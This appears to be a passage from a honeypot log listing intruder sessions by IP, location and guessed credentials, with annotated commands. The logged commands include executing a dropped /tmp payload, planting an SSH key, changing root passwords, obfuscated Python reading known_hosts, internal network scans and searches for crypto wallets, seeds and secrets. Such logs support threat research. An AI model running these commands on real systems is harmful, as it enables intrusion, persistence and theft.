fGM/nWMpYwRn6cGhfEDGU+sDk8X6OHz4i030NVL55dt+njIcWqC91Gmly; fi; echo 123456 > /tmp/.opass; chmod +x /tmp/0c5RddmdrF && /tmp/0c5RddmdrF asHkWMRYwxzufnVfGTUTVGt78AnDRsRG5NIFGdL7WcZPyB/4eWJNGDEQQ2997hDHWMBc4dsSHNDgSMZB3BjxfXVfGjEHX298+hHCTsRI4dYFGtPkRsNOxgfxe2NXEDgbXnt5+B7cR8Bc+9MaGM/kXspMxRzwfntcGDgHVWJm8RjLWMNc59sdHdHjSMNFywf1cXVVBzIYV2148RnHVsNZ4M8ZGND7X8RYwx72cm1dGDAcTW9/7hvGRNxa59AFGtblUstAxxrgfGxDGzMQQ2px8QfDQcVS49McG8HnWsJYwxHwZmJUBzcYV2148RnHVsNR5s8aGtP7WcBA3BvyeWFUHDcdTWNm8RrEWMNb488ZGtfvUMdHxAnxempDHC4bXnV89hPKT8Ba9dkZBdDgXtxHyxzueWxeEzcZX2No+AfDRcRG5NIdBdPkXshOxxj2aG9aBzEbXHV5+B3cR8FQ79gTGdL1XsJYwx/ucHVZGzoQWG174BjAR9xd+9MYBdXjUspPwBvgfGxDGzMQQ2p/8QfDR8pS4tQdHsHkWsJYwB3uemldBzEfX2Fw8xvEVsZf+9MYEs/kUcNYwx73cm1fHjAJWWxm8hrLWMBG59URE9jlW9JHwBrueWlUBzIbXnV/9RPLRsZa9dAaEs/hXdxPxwfyfG9XEDcYWHt8+QfARcBG59EaBdPlWMhPxx7xaGpcGi4YVHV58BDcR8Ff79cfH9P1XMtYwBrzZmlZES4cWmF+9hrLVsZf+9MfGM/nWMpYwRn6cGhfEDGU+sDk8X6OHz4i030NVL55dt+njIcWqC91Gmly" & // payload download from C2
$ head -c 3716336 > /tmp/oUeqzfZng9 // execute from /tmp
🎭 kimchi_root_2 (220.82.200.159) β€” Gunsan, South Korea Β· 1 session Β· 1 cmd
2026-05-07 15:11 EDT Β· as cryptolendify/@cryptolendify@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_119 (180.252.199.166) β€” Makassar, Indonesia Β· 2 sessions Β· 38 cmds
2026-05-07 13:50 EDT Β· as root/Qweqwe11, root/good123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:Ck4JeBQmsopr"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:eW2z2vP7fkHM"|chpasswd|bash
🎭 bibimbap_root_14 (112.219.104.42) β€” Nowon-gu, South Korea Β· 1 session Β· 20 cmds
2026-05-07 14:49 EDT Β· as ts3user/ts3user
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ts3user\nrQeHhUqwRNc3\nrQeHhUqwRNc3"|passwd|bash
$ Enter new UNIX password:
$ echo "ts3user\nrQeHhUqwRNc3\nrQeHhUqwRNc3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 frost_root_4 (188.92.241.150) β€” Moscow, Russia Β· 1 session Β· 20 cmds
2026-05-07 14:43 EDT Β· as ubuntu/!qwe123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "!qwe123\nCcutqQJGceMK\nCcutqQJGceMK"|passwd|bash
$ Enter new UNIX password:
$ echo "!qwe123\nCcutqQJGceMK\nCcutqQJGceMK\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_122 (156.238.252.133) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 38 cmds
2026-05-07 13:52 EDT Β· as root/Qweqwe11, root/good123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:pSoDZv9sl5NJ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:TLBwwzYjcKsG"|chpasswd|bash
🎭 strudel_root_3 (213.209.159.226) β€” Augsburg, Germany Β· 1 session Β· 1 cmd
2026-05-07 11:58 EDT Β· as cryptolendify/Cryptolendify%
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cipher_root (35.240.174.82) β€” Singapore, Singapore Β· 1 session Β· 1 cmd
2026-05-07 11:52 EDT Β· as cryptolendify/cryptolendify@25
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 samba_root (168.196.144.234) β€” Pouso Alegre, Brazil Β· 3 sessions Β· 3 cmds
2026-05-06 16:10 EDT Β· as root/Mail@147, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 bistro_root_14 (109.205.179.168) β€” Lauterbourg, France Β· 3 sessions Β· 3 cmds
2026-05-06 16:03 EDT Β· as root/blackcat, root/mail_2020
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 autobahn_root_5 (213.209.159.238) β€” Augsburg, Germany Β· 1 session Β· 1 cmd
2026-05-07 10:20 EDT Β· as root/cryptolendify-321
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cowboy_root_60 (198.98.55.71) β€” New York, United States Β· 1 session Β· 20 cmds
2026-05-07 10:19 EDT Β· as test3/test
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "test\nEjcHtY78GTSg\nEjcHtY78GTSg"|passwd|bash
$ Enter new UNIX password:
$ echo "test\nEjcHtY78GTSg\nEjcHtY78GTSg\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_root (35.208.117.12) β€” Council Bluffs, United States Β· 99 sessions Β· 114 cmds
2026-05-07 09:40 EDT Β· as ubuntu/Muddy2!@#2wsx
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ python -c "f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); d=f.read(); f.close(); print hex(len(d)); print repr(d)"
$ perl -e "open(F,q(<),q(/root/.ssh/known_hosts)); while(<F>){print}" // Perl one-liner execution
$ more /root/.ssh/known_hosts 2>/dev/null || cat /root/.ssh/known_hosts
$ sed -n "p" /root/.ssh/known_hosts
$ cat /root/.ssh/known_hosts Γ—3
$ /bin/sh -c "python -c \"import os; os.system(chr(108)+chr(115)+chr(32)+chr(45)+chr(97)+chr(32)+chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47))\"" // Python one-liner execution
$ python -c "import os; os.system(chr(108)+chr(115)+chr(32)+chr(45)+chr(97)+chr(32)+chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47))" // Python one-liner execution
$ /bin/sh -c "python -c \"import sys; f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); print f.read().encode(chr(10)); f.close()\"" // Python one-liner execution
$ python -c "import sys; f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); print f.read().encode(chr(10)); f.close()" // Python one-liner execution
$ /bin/sh -c "grep 207 /root/.ssh/known_hosts 2>/dev/null; grep 173 /root/.ssh/known_hosts 2>/dev/null; grep 147 /root/.ssh/known_hosts 2>/dev/null; grep 104 /root/.ssh/known_hosts 2>/dev/null; echo GREP_DONE"
$ grep 207 /root/.ssh/known_hosts 2>/dev/null; grep 173 /root/.ssh/known_hosts 2>/dev/null; grep 147 /root/.ssh/known_hosts 2>/dev/null; grep 104 /root/.ssh/known_hosts 2>/dev/null; echo GREP_DONE
$ /bin/sh -c "grep -E "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" /root/.ssh/known_hosts"
$ grep -E [ 0-9 ] +. [ 0-9 ] +. [ 0-9 ] +. [ 0-9 ] + /root/.ssh/known_hosts
$ /bin/sh -c "dd if=/root/.ssh/known_hosts bs=1024 count=1 2>/dev/null | python -c \"import sys; data=sys.stdin.read(); print repr(data)\"" // Python one-liner execution
$ dd if=/root/.ssh/known_hosts bs=1024 count=1 2>/dev/null | python -c "import sys; data=sys.stdin.read(); print repr(data)" // Python one-liner execution
$ /bin/sh -c "dd if=/root/.ssh/known_hosts bs=1024 count=1 2>/dev/null | wc -c" // disk operation
$ dd if=/root/.ssh/known_hosts bs=1024 count=1 2>/dev/null | wc -c // disk operation
$ /bin/sh -c "dd if=/root/.ssh/known_hosts bs=442 count=1 2>/dev/null | wc -c" // disk operation
$ dd if=/root/.ssh/known_hosts bs=442 count=1 2>/dev/null | wc -c // disk operation
$ /bin/sh -c "python -c \"f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); data=f.read(); print len(data); f.close()\""
$ python -c "f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); data=f.read(); print len(data); f.close()"
$ /bin/sh -c "ls -la /root/.ssh/; ls -la /root/.ssh/known_hosts; wc -c < /root/.ssh/known_hosts"
$ ls -la /root/.ssh/; ls -la /root/.ssh/known_hosts; wc -c < /root/.ssh/known_hosts
$ /bin/sh -c "cat /root/.ssh/known_hosts; echo ===END_KH==="
$ cat /root/.ssh/known_hosts; echo ===END_KH===
$ echo hello
$ sh -c echo test2
$ echo test2
$ /bin/sh -c echo test
$ echo test
$ python -c "f=open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(47)+chr(46)+chr(115)+chr(115)+chr(104)+chr(47)+chr(107)+chr(110)+chr(111)+chr(119)+chr(110)+chr(95)+chr(104)+chr(111)+chr(115)+chr(116)+chr(115)); print repr(f.read()); f.close()"
$ python -c "print open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(46)+chr(116)+chr(120)+chr(116)).read()"
$ python -c "import os; os.system(chr(98)+chr(97)+chr(115)+chr(101)+chr(54)+chr(52)+chr(32)+chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(46)+chr(116)+chr(120)+chr(116))" // Python one-liner execution
$ /bin/sh -c "base64 /root/.ssh/known_hosts > /tmp/kh_b64.txt; cat /tmp/kh_b64.txt" // execute from /tmp
$ base64 /root/.ssh/known_hosts > /tmp/kh_b64.txt; cat /tmp/kh_b64.txt // execute from /tmp
$ cat /tmp/kh_b64.txt // execute from /tmp
$ base64 /root/.ssh/known_hosts > /tmp/kh_b64.txt // execute from /tmp
$ dd if=/root/.ssh/known_hosts 2>/dev/null // disk operation
$ python -c "print(open(chr(47)+chr(114)+chr(111)+chr(111)+chr(116)+chr(46)+chr(116)+chr(120)+chr(116)).read())" 2>/dev/null || echo "FAIL"
$ ls -la /var/backups/ 2>/dev/null
$ cat /root/.ssh/known_hosts | head
$ ls -la /root/.ssh/known_hosts; od -c /root/.ssh/known_hosts | head -5
$ wc -c /root/.ssh/known_hosts; cat /root/.ssh/known_hosts; echo "END"
$ find / -name "id_*" -o -name "*.pub" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"
$ ls -la /root/.ssh/
$ cat /etc/ssh/ssh_host_ecdsa_key.pub
$ cat /etc/ssh/ssh_host_dsa_key.pub
$ cat /etc/ssh/ssh_host_rsa_key.pub
$ python -c "import socket; s=socket.socket(); s.settimeout(2); s.connect(('10.0.28.1',22)); print('22:OPEN'); s.close()" 2>&1; echo '==='; python -c "import socket; s=socket.socket(); s.settimeout(2); s.connect(('10.0.28.2',22)); print('22:OPEN'); s.close()" 2>&1; echo '==='; python -c "import socket; s=socket.socket(); s.settimeout(2); s.connect(('10.0.28.10',22)); print('22:OPEN'); s.close()" 2>&1 // Python one-liner execution
$ curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.1/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.2/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.3/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.4/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.5/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.6/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.7/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.9/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.10/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.11/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.12/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.13/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.14/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.15/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.16/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.17/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.18/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.19/ 2>&1; echo ''; curl -s -o /dev/null -w '%{http_code}' --connect-timeout 2 http://10.0.28.20/ 2>&1; echo '' // payload download
$ ping 10.0.28.20 2>&1 | head -1
$ ping 10.0.28.19 2>&1 | head -1
$ ping 10.0.28.18 2>&1 | head -1
$ ping 10.0.28.17 2>&1 | head -1
$ ping 10.0.28.16 2>&1 | head -1
$ ping 10.0.28.15 2>&1 | head -1
$ ping 10.0.28.14 2>&1 | head -1
$ ping 10.0.28.13 2>&1 | head -1
$ ping 10.0.28.12 2>&1 | head -1
$ ping 10.0.28.11 2>&1 | head -1
$ ping 10.0.28.10 2>&1 | head -1
$ ping 10.0.28.9 2>&1 | head -1
$ ping 10.0.28.8 2>&1 | head -1
$ ping 10.0.28.7 2>&1 | head -1
$ ping 10.0.28.6 2>&1 | head -1
$ ping 10.0.28.5 2>&1 | head -1
$ ping 10.0.28.4 2>&1 | head -1
$ ping 10.0.28.3 2>&1 | head -1
$ ping 10.0.28.2 2>&1 | head -1
$ ping 10.0.28.1 2>&1 | head -1
$ ping 10.0.28.1 2>&1
$ ping -n -c 1 10.0.28.1 2>&1; echo "==="
$ ping -c 1 10.0.28.1 2>&1; echo "==="; ping -c 1 10.0.28.2 2>&1; echo "==="; ping -c 1 10.0.28.10 2>&1
$ ping -c 1 -w 1 10.0.28.1 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.2 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.3 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.4 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.5 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.6 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.7 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.9 2>&1; echo "---"; ping -c 1 -w 1 10.0.28.10 2>&1
$ for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25; do; result=$(ping -c 1 -w 1 10.0.28.$i 2>&1); if echo "$result" | grep -q "64 bytes"; then; echo "ALIVE: 10.0.28.$i"; fi; done; echo "---LOCAL_SCAN_DONE---"
$ ping -c 1 -w 1 10.0.28.$i 2 >& 1
$ echo "---PING_VPN---"; ping -c 1 -W 2 207.180.241.246 2>&1; echo "---PING_HOSTING1---"; ping -c 1 -W 2 173.224.125.34 2>&1; echo "---PING_HOSTING2---"; ping -c 1 -W 2 muddy.mwgsm.com 2>&1; echo "---PING_N8N---"; ping -c 1 -W 2 147.93.154.84 2>&1; echo "---DNS_REVERSE---"; nslookup 104.152.208.8 2>&1 || host 104.152.208.8 2>&1 || echo "no nslookup/host"; echo "---ARP_TABLE---"; cat /proc/net/arp 2>/dev/null || echo "no arp"; echo "---ROUTING---"; route -n 2>/dev/null || netstat -rn 2>/dev/null; echo "---GATEWAY_CHECK---"; ping -c 1 -W 2 104.152.208.1 2>&1; echo "---DONE_PING---"
$ ping -c 1 -W 1 104.180.241.246 2>/dev/null && echo "PONG_104.152.208.$i"
$ stat /etc/ssh/sshd_config
$ wc /etc/ssh/sshd_config
$ wc -l /etc/ssh/sshd_config; wc -c /etc/ssh/sshd_config
$ cat /etc/ssh/sshd_config
$ cat /etc/ssh/sshd_config 2>/dev/null; echo "---HOST_KEYS---"; cat /etc/ssh/ssh_host_dsa_key.pub 2>/dev/null; echo "---HOST_RSA---"; cat /etc/ssh/ssh_host_rsa_key.pub 2>/dev/null; echo "---HOST_ECDSA---"; cat /etc/ssh/ssh_host_ecdsa_key.pub 2>/dev/null
$ du -sh /* 2>/dev/null; echo "---SECDIR---"; ls -la /etc/ssh/ 2>/dev/null; echo "---SSH_CONFIG---"; cat /etc/ssh/sshd_config 2>/dev/null
$ echo "---KNOWN_HOSTS---"; cat /root/.ssh/known_hosts 2>/dev/null; echo "---APTITUDE---"; cat /root/.aptitude/config 2>/dev/null; echo "---ROOT_BASHRC---"; cat /root/.bashrc 2>/dev/null; echo "---DISK_USAGE_DETAIL---"; du -sh /* 2>/dev/null; du -sh /var/* 2>/dev/null; du -sh /etc/* 2>/dev/null | grep -v -E "0K|4$"; echo "---DONE---"
$ find /home -type f 2>/dev/null; echo "---H_DONE---"; find /root -type f 2>/dev/null; echo "---R_DONE---"; find /opt -type f 2>/dev/null; echo "---O_DONE---"; find /srv -type f 2>/dev/null; echo "---S_DONE---"
$ find / -maxdepth 6 -type f -name "*wallet*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W1---"; find / -maxdepth 6 -type f -name "*mnemonic*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W2---"; find / -maxdepth 6 -type f -name "*seed*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W3---"; find / -maxdepth 6 -type f -name "*.kdbx" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W4---"; find / -maxdepth 6 -type f -name "*keystore*" 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---W5---"
$ echo "---FIND_WALLET---"; find / -maxdepth 6 -type f \( -name "*wallet*" -o -name "*mnemonic*" -o -name "*seed*" -o -name "*private*key*" -o -name "*keystore*" -o -name "*.kdbx" -o -name "wallet.dat" -o -name "*bip39*" -o -name "*ledger*" -o -name "*trezor*" -o -name "*metamask*" -o -name "*phantom*" -o -name "*coinbase*" \) 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share"; echo "---FIND_TEXT_CONTENT---"; find /home -type f 2>/dev/null; find /root -type f 2>/dev/null | grep -v -E "/proc|/sys"; echo "---FIND_ANY_DATA---"; find /opt /srv /var/www /data /home /root -type f 2>/dev/null | grep -v -E "/proc|/sys|/usr"; echo "---DONE_WALLET---"
$ ps aux | grep -v grep | grep -E "mysql|ejabberd|exim|php|apache|nginx"
$ find / -maxdepth 5 -type f -size +1k -size -1M -newer /etc/hostname 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share|/usr/local|dpkg|apt|log|cache|/tmp"
$ find / -maxdepth 5 -type f -size +1k -size -1M -newer /etc/hostname 2>/dev/null | grep -v -E "/proc|/sys|/usr/lib|/usr/share|/usr/local|dpkg|apt|log|cache|/tmp" | head -50
$ grep -r -l -i "password\|secret\|api_key\|apikey\|token" /etc/ 2>/dev/null | grep -v -E "/proc|/sys|/usr/share|/etc/ssl|/etc/pam|/etc/apt" | head -30
$ ls /etc/init.d/
$ cat /etc/init.d/ssh | grep -v "^#" | grep -v "^$"
